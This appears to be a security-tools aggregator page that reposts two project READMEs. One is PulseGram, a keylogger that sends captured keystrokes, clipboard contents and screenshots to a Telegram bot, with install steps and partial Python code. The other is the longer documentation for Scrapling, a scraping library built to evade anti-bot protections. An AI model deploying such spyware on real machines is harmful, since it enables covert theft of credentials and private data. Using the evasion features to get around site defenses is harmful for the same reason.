
Pulsegram - Integrated Keylogger With Telegram

By: Unknown β€” April 29th 2025 at 12:30



PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts.

⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.


(ASCII art banner: PulseGram)

Author: Omar Salazar
Version: V.1.0

Features

  • Keystroke capture: Records keystrokes and sends them to the Telegram bot.
  • Clipboard monitoring: Sends the copied clipboard content in real-time.
  • Periodic screenshots: Takes screenshots and sends them to the bot.
  • Error logs: Logs errors in an errors_log.txt file to facilitate debugging.


Installation

  1. Clone the repository:

     git clone https://github.com/TaurusOmar/pulsegram
     cd pulsegram

  2. Install dependencies: Make sure you have Python 3 and pip installed. Then run:

     pip install -r requirements.txt

  3. Set up the Telegram bot token: Create a bot on Telegram using BotFather. Copy your token and paste it into the code in main.py where the bot is initialized.

  4. Copy your chat ID (e.g., chat_id="131933xxxx") into keylogger.py.

Usage

Run the tool on the target machine with:

python pulsegram.py

Modules

pulsegram.py

This is the main file of the tool, which initializes the bot and launches asynchronous tasks to capture and send data.

Bot(token="..."): Initializes the Telegram bot with your personal token.
asyncio.gather(...): Launches multiple tasks to execute clipboard monitoring, screenshot capture, and keystroke logging.
log_error: In case of errors, logs them in an errors_log.txt file.
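
To make the structure concrete, here is a minimal sketch of how these pieces could fit together. The task names come from the module descriptions in this README; the aiogram-style Bot import, the token placeholder, and the module paths are assumptions, so match them to what the repository actually uses.

import asyncio

from aiogram import Bot  # assumption: an aiogram-style Bot; use whatever pulsegram.py actually imports
from helpers import log_error
from keylogger import (capture_keystrokes, send_keystrokes_to_telegram,
                       capture_screenshots, log_clipboard)

TOKEN = "123456:REPLACE_ME"  # placeholder: the token you created with BotFather

async def main():
    bot = Bot(token=TOKEN)
    try:
        # Run every monitoring task concurrently; each one loops forever on its own interval
        await asyncio.gather(
            capture_keystrokes(bot),
            send_keystrokes_to_telegram(bot),
            capture_screenshots(bot),
            log_clipboard(bot),
        )
    except Exception as exc:
        log_error(exc)

if __name__ == "__main__":
    asyncio.run(main())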

helpers.py

This module contains auxiliary functions that assist the overall operation of the tool.

log_error(): Logs any errors in errors_log.txt with a date and time format.
get_clipboard_content(): Captures the current content of the clipboard.
capture_screenshot(): Takes a screenshot and temporarily saves it to send it to the Telegram bot.
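
A hedged sketch of what these helpers might look like. The library choices (pyperclip for the clipboard, Pillow's ImageGrab for screenshots) are assumptions, not necessarily what the repository uses.

from datetime import datetime

import pyperclip           # assumption: clipboard access via pyperclip
from PIL import ImageGrab  # assumption: screenshots via Pillow

def log_error(error):
    """Append the error with a timestamp to errors_log.txt."""
    with open("errors_log.txt", "a", encoding="utf-8") as f:
        f.write(f"{datetime.now():%Y-%m-%d %H:%M:%S} - {error}\n")

def get_clipboard_content():
    """Return the current clipboard text."""
    return pyperclip.paste()

def capture_screenshot(path="screenshot.png"):
    """Take a screenshot and save it temporarily so it can be sent to the bot."""
    ImageGrab.grab().save(path)
    return path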

keylogger.py

This module handles keylogging, clipboard monitoring, and screenshot captures.

capture_keystrokes(bot): Asynchronous function that captures keystrokes and sends the information to the Telegram bot.
send_keystrokes_to_telegram(bot): This function sends the accumulated keystrokes to the bot.
capture_screenshots(bot): Periodically captures an image of the screen and sends it to the bot.
log_clipboard(bot): Sends the contents of the clipboard to the bot.

Action Configurations

Change the capture and information sending time interval.

async def send_keystrokes_to_telegram(bot):
    global keystroke_buffer
    while True:
        await asyncio.sleep(1)  # Change the key sending interval

async def capture_screenshots(bot):
    while True:
        await asyncio.sleep(30)  # Change the screenshot capture interval
        try:
            ...

async def log_clipboard(bot):
    previous_content = ""
    while True:
        await asyncio.sleep(5)  # Change the interval to check for clipboard changes
        current_content = get_clipboard_content()

Security Warning

This project is for educational purposes only and for security testing in your own environments or with express authorization. Unauthorized use of this tool may violate local laws and privacy policies.

Contributions

Contributions are welcome. Please ensure to respect the code of conduct when collaborating.

License

This project is licensed under the MIT License.




Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!

By: Unknown β€” April 28th 2025 at 12:30


Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling's powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that take less memory than standard dictionaries, with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

| # | Library | Time (ms) | vs Scrapling |
|:-:|---------|----------:|-------------:|
| 1 | Scrapling | 5.44 | 1.0x |
| 2 | Parsel/Scrapy | 5.53 | 1.017x |
| 3 | Raw Lxml | 6.76 | 1.243x |
| 4 | PyQuery | 21.96 | 4.037x |
| 5 | Selectolax | 67.12 | 12.338x |
| 6 | BS4 with Lxml | 1307.03 | 240.263x |
| 7 | MechanicalSoup | 1322.64 | 243.132x |
| 8 | BS4 with html5lib | 3373.75 | 620.175x |

As you see, Scrapling is on par with Scrapy and slightly faster than Lxml, the library both of them are built on top of; these are the closest results to Scrapling. PyQuery is also built on top of Lxml, but Scrapling is still 4 times faster.

Extraction By Text Speed Test

| Library | Time (ms) | vs Scrapling |
|---------|----------:|-------------:|
| Scrapling | 2.51 | 1.0x |
| AutoScraper | 11.41 | 4.546x |

Scrapling can find elements with more methods, and it returns full element Adaptor objects, not just the text as AutoScraper does. So, to make this test fair, both libraries extract an element by its text, find similar elements, and then extract the text content of all of them. As you see, Scrapling is still 4.5 times faster at the same task.

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; starting from version 0.2.9, it requires at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install the browser dependencies needed to use the Fetcher classes:

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features. They perform requests or fetch pages for you in a single call and return an Adaptor object. This feature was introduced because, previously, the only option was to fetch the page however you wanted and then pass it manually to the Adaptor class to create an Adaptor instance and start working with the page.

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
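
A quick illustration based on the attributes listed above (the exact values depend on the site, of course):

>> page = Fetcher().get('https://quotes.toscrape.com/')
>> page.status, page.reason       # e.g. (200, 'OK')
>> page.headers['content-type']   # headers, cookies, and request_headers behave like dictionaries
>> page.css_first('title::text')  # everything from the Adaptor API is still available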

[!NOTE] The auto_match argument is enabled by default; it is the one you should care about the most, as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options. Here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers and then set a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, which makes httpx retry requests that fail for any reason. The default number of retries for all Fetcher methods is 3.

Note: all headers generated by the stealthy_headers argument can be overwritten by you through the headers argument.

You can route all traffic (HTTP and HTTPS) through a proxy for any of these methods using this format: http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

The complete list of arguments:

| Argument | Description | Optional |
|:--------:|-------------|:--------:|
| url | Target URL | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ |
| block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| disable_resources | Drop requests for unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests on some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if both are used._ | βœ”οΈ |
| block_webrtc | Blocks WebRTC entirely. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ |
| humanize | Humanize the cursor movement. Takes either True or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ |
| allow_webgl | Enabled by default. Disabling WebGL is not recommended, as many WAFs now check whether WebGL is enabled. | βœ”οΈ |
| geoip | Recommended to use with proxies; automatically uses the IP's longitude, latitude, timezone, country, and locale, and spoofs the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ |
| disable_ads | Disabled by default; when enabled, this installs the `uBlock Origin` addon in the browser. | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| proxy | The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is for Scrapling to match the fingerprints to the current OS. | βœ”οΈ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _The default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests made by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:

  1. Vanilla Playwright, without any modifications other than the ones you chose.
  2. Stealthy Playwright, with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
     • Patching the CDP runtime fingerprint.
     • Mimicking some real browser properties by injecting several JS files and using custom options.
     • Using custom flags on launch to hide Playwright even more and make it faster.
     • Generating real browser headers of the same type and same user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled with it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

The complete list of arguments:

| Argument | Description | Optional |
|:--------:|-------------|:--------:|
| url | Target URL | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), or `False` for headful/visible mode. | βœ”οΈ |
| disable_resources | Drop requests for unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests on some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate and use a real useragent of the same browser.** | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| wait_selector_state | The state to wait for the selector given with `wait_selector`. _The default state is `attached`._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if both are used. | βœ”οΈ |
| proxy | The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ |
| disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ |
| stealth | Enables stealth mode; always check the documentation to see what stealth mode currently does. | βœ”οΈ |
| real_chrome | If you have the Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ |
| locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ |
| cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ |
| nstbrowser_mode | Enables NSTBrowser mode; **it has to be used with the `cdp_url` argument or it will be completely ignored.** | βœ”οΈ |
| nstbrowser_config | The config you want to send with requests to the NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
    ...  # do something with it

You can search for a specific ancestor of an element that satisfies a function. All you need to do is pass a function that takes an Adaptor object as an argument and returns True if the condition is satisfied or False otherwise, like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'Β£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'Β£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">Β£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">Β£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
...     print({
...         "name": product.css_first('h3 a::text'),
...         "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
...         "stock": product.css('.availability::text')[-1].clean()
...     })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1', auto_save=True)
if not element:  # One day the website changes?
    element = page.css('#p1', auto_match=True)  # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverflow's website from 2010, pretty old huh? Let's test whether the auto-match feature can extract the same button from the old 2010 design and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector on both versions.

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain. This is because, for Scrapling, these are two different URLs, not the same website, so it isolates their data. To tell Scrapling they are the same website, we pass the domain we want to use for saving auto-match data for both, so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class once and the Fetcher class the second time just to show that you can create the Adaptor object yourself if you have the source, or fetch the source with any Fetcher class and it will create the Adaptor object for you.
  2. Passing the auto_save argument while the auto_match argument is set to False when initializing the Adaptor/Fetcher object will only result in the auto_save argument value being ignored, with the warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database gets created/connected only when you are planning to use the auto-matching features. The same applies to the auto_match argument.
  3. The auto_match parameter works only for Adaptor instances, not Adaptors, so something like page.css('body').css('#p1', auto_match=True) will raise an error because you can't auto-match a whole list; you have to be specific and do something like page.css_first('body').css('#p1', auto_match=True).

Find elements by filters

Inspired by BeautifulSoup's find_all function, you can find elements by using the find_all/find methods. Both methods can take multiple types of filters and return all elements on the page to which all these filters apply.

To be more specific:

  • Any string passed is considered a tag name.
  • Any iterable passed (List/Tuple/Set) is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element attribute names to attribute values.
  • Any regex patterns passed are used as filters on elements by their text content.
  • Any functions passed are used as filters.
  • Any keyword argument passed is considered an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object of any element directly:

>>> quote._root
<Element div at 0x107f98870>

  • Saving and retrieving elements manually to auto-match them outside the css and xpath methods, but you have to set the identifier yourself.

  • To save an element to the database:

>>> element = page.find_by_text('Tipping the Velvet', first_match=True)
>>> page.save(element, 'my_special_element')

  • Later, when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this:

>>> element_dict = page.retrieve('my_special_element')
>>> page.relocate(element_dict, adaptor_type=True)
